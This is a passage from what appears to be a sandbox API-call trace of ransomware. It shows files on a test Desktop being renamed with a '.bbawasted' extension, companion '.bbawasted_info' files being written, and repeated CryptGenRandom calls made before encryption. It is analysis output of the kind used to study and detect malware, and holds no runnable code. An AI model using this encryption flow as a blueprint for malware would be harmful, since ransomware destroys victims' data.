0x110 [0069.360] WriteFile (in: hFile=0x110, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0069.361] SetEndOfFile (hFile=0x110) returned 1 [0069.361] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.361] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.362] lstrcpyW (in: lpString1=0x5bf974, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.362] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7__HJOqTPur_MVS8IuG6.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7__hjoqtpur_mvs8iug6.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7__HJOqTPur_MVS8IuG6.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7__hjoqtpur_mvs8iug6.mp3.bbawasted")) returned 1 [0069.363] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7__HJOqTPur_MVS8IuG6.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7__hjoqtpur_mvs8iug6.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0069.363] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0069.363] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x2683 [0069.363] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2683) returned 0x570000 [0069.363] CloseHandle (hObject=0xf8) returned 1 [0069.365] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0069.366] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0069.366] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.366] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0069.366] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0069.366] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.375] SetEndOfFile (hFile=0x110) returned 1 [0069.378] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.378] CloseHandle (hObject=0x110) returned 1 [0069.379] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0069.379] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bfd68 | out: hHeap=0x580000) returned 1 [0069.379] _aulldvrm () returned 0x0 [0069.379] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0069.380] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0069.380] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8 uWhE9LSHh.odt") returned 57 [0069.380] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27c) returned 0x5bf8f0 [0069.380] lstrcpyW (in: lpString1=0x5bf962, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.380] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0069.380] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0069.381] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0069.381] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.381] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8 uWhE9LSHh.odt.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8 uwhe9lshh.odt.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0069.382] WriteFile (in: hFile=0x110, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0069.383] SetEndOfFile (hFile=0x110) returned 1 [0069.383] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.383] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.383] lstrcpyW (in: lpString1=0x5bf962, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.384] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8 uWhE9LSHh.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8 uwhe9lshh.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8 uWhE9LSHh.odt.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8 uwhe9lshh.odt.bbawasted")) returned 1 [0069.385] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8 uWhE9LSHh.odt.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8 uwhe9lshh.odt.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0069.385] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0069.385] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x156c7 [0069.385] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x156c7) returned 0xfe0000 [0069.385] CloseHandle (hObject=0xfc) returned 1 [0069.389] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0069.390] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0069.390] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.390] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0069.440] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0069.440] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.449] SetEndOfFile (hFile=0x110) returned 1 [0069.451] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.451] CloseHandle (hObject=0x110) returned 1 [0069.452] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0069.452] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bfe48 | out: hHeap=0x580000) returned 1 [0069.452] _aulldvrm () returned 0x0 [0069.453] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0069.453] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0069.453] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.453] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hxqtX0rsEVf4tTgoz.ppt") returned 63 [0069.453] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x288) returned 0x5bf070 [0069.453] lstrcpyW (in: lpString1=0x5bf0ee, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.453] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0069.453] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0069.454] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0069.454] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.454] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hxqtX0rsEVf4tTgoz.ppt.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hxqtx0rsevf4ttgoz.ppt.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0069.455] WriteFile (in: hFile=0x110, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0069.456] SetEndOfFile (hFile=0x110) returned 1 [0069.456] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.456] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.457] lstrcpyW (in: lpString1=0x5bf0ee, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.457] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hxqtX0rsEVf4tTgoz.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hxqtx0rsevf4ttgoz.ppt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hxqtX0rsEVf4tTgoz.ppt.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hxqtx0rsevf4ttgoz.ppt.bbawasted")) returned 1 [0069.458] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hxqtX0rsEVf4tTgoz.ppt.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hxqtx0rsevf4ttgoz.ppt.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0069.458] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0069.458] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x98c2 [0069.458] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x98c2) returned 0x570000 [0069.458] CloseHandle (hObject=0xf8) returned 1 [0069.461] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0069.461] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0069.461] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.461] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0069.462] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0069.462] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.470] SetEndOfFile (hFile=0x110) returned 1 [0069.473] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.473] CloseHandle (hObject=0x110) returned 1 [0069.474] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0069.474] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c00c0 | out: hHeap=0x580000) returned 1 [0069.474] _aulldvrm () returned 0x0 [0069.474] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0069.475] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0069.475] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.475] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iRzZ4R8XxVvwsN3P.mp4") returned 62 [0069.475] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x286) returned 0x5bf070 [0069.475] lstrcpyW (in: lpString1=0x5bf0ec, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.475] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0069.475] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0069.476] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0069.476] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.476] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iRzZ4R8XxVvwsN3P.mp4.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\irzz4r8xxvvwsn3p.mp4.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0069.477] WriteFile (in: hFile=0x110, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0069.478] SetEndOfFile (hFile=0x110) returned 1 [0069.478] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.478] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.478] lstrcpyW (in: lpString1=0x5bf0ec, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.478] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iRzZ4R8XxVvwsN3P.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\irzz4r8xxvvwsn3p.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iRzZ4R8XxVvwsN3P.mp4.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\irzz4r8xxvvwsn3p.mp4.bbawasted")) returned 1 [0069.479] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iRzZ4R8XxVvwsN3P.mp4.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\irzz4r8xxvvwsn3p.mp4.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0069.479] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0069.480] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x14427 [0069.480] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14427) returned 0xfe0000 [0069.480] CloseHandle (hObject=0xfc) returned 1 [0069.484] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0069.485] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0069.485] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.485] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0069.485] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0069.485] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.494] SetEndOfFile (hFile=0x110) returned 1 [0069.496] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.496] CloseHandle (hObject=0x110) returned 1 [0069.500] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0069.500] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c5540 | out: hHeap=0x580000) returned 1 [0069.500] _aulldvrm () returned 0x0 [0069.500] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0069.501] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0069.501] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.501] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IuwVZGS1E0P.m4a") returned 57 [0069.501] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27c) returned 0x5bf070 [0069.501] lstrcpyW (in: lpString1=0x5bf0e2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.501] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0069.501] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0069.502] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0069.502] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.502] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IuwVZGS1E0P.m4a.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iuwvzgs1e0p.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0069.503] WriteFile (in: hFile=0x110, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0069.504] SetEndOfFile (hFile=0x110) returned 1 [0069.504] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.504] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.504] lstrcpyW (in: lpString1=0x5bf0e2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.504] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IuwVZGS1E0P.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iuwvzgs1e0p.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IuwVZGS1E0P.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iuwvzgs1e0p.m4a.bbawasted")) returned 1 [0069.505] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IuwVZGS1E0P.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iuwvzgs1e0p.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0069.505] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0069.506] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x128ca [0069.506] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x128ca) returned 0xfe0000 [0069.506] CloseHandle (hObject=0xf8) returned 1 [0069.509] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0069.510] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0069.510] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.510] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0069.511] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0069.511] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.551] SetEndOfFile (hFile=0x110) returned 1 [0069.610] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.610] CloseHandle (hObject=0x110) returned 1 [0069.611] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0069.611] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c5618 | out: hHeap=0x580000) returned 1 [0069.611] _aulldvrm () returned 0x0 [0069.611] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0069.612] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0069.612] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.612] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4OU4lf 3X3yBR0MaJ_r.gif") returned 66 [0069.612] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28e) returned 0x5bf070 [0069.612] lstrcpyW (in: lpString1=0x5bf0f4, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.612] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0069.612] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0069.613] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0069.613] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.613] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4OU4lf 3X3yBR0MaJ_r.gif.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\q4ou4lf 3x3ybr0maj_r.gif.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0069.614] WriteFile (in: hFile=0x110, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0069.615] SetEndOfFile (hFile=0x110) returned 1 [0069.615] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.615] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.615] lstrcpyW (in: lpString1=0x5bf0f4, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.615] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4OU4lf 3X3yBR0MaJ_r.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\q4ou4lf 3x3ybr0maj_r.gif"), 